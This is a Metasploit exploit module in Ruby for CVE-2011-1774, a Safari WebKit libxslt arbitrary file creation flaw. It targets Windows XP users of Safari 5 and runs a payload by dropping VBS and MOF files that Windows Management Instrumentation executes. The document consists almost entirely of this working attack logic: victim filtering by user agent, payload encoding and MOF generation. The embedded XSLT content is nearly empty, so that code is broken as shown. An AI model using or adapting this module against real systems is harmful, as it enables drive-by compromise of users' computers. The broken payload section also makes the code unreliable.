## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::WbemExec def initialize(info = {}) super(update_info(info, 'Name' => 'Apple Safari Webkit libxslt Arbitrary File Creation', 'Description' => %q{ This module exploits a file creation vulnerability in the Webkit rendering engine. It is possible to redirect the output of a XSLT transformation to an arbitrary file. The content of the created file must be ASCII or UTF-8. The destination path can be relative or absolute. This module has been tested on Safari and Maxthon. Code execution can be acheived by first uploading the payload to the remote machine in VBS format, and then upload a MOF file, which enables Windows Management Instrumentation service to execute the VBS. }, 'License' => MSF_LICENSE, 'Author' => ['Nicolas Gregoire'], 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-1774'], ['OSVDB', '74017'], ['URL', 'http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html'], ], 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 2048, }, 'Platform' => 'win', 'Targets' => [ #Windows before Vista [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 20 2011')) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) # Check target before attacking agent = request.headers['User-Agent'] if agent !~ /Windows NT 5\.1/ or agent !~ /Safari\/5/ or agent =~ /Chrome/ print_error("This target isn't supported: #{agent.to_s}") send_not_found(cli) return end url = "http://" url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] url += ":" + datastore['SRVPORT'] + get_resource() + "/" content = <<-EOS ]> EOS #Clear the extra tabs content = content.gsub(/^\t\t/, '') print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, content, {'Content-Type'=>'application/xml'}) handler(cli) end def exploit # In order to save binary data to the file system the payload is written to a VBS # file and execute it from there via a MOF @mof_name = rand_text_alpha(rand(5)+5) + ".mof" @vbs_name = rand_text_alpha(rand(5)+5) + ".vbs" print_status("Encoding payload into vbs...") payload = generate_payload_exe @vbs_content = Msf::Util::EXE.to_exe_vbs(payload) print_status("Generating mof file...") @mof_content = generate_mof(@mof_name, @vbs_name) super end end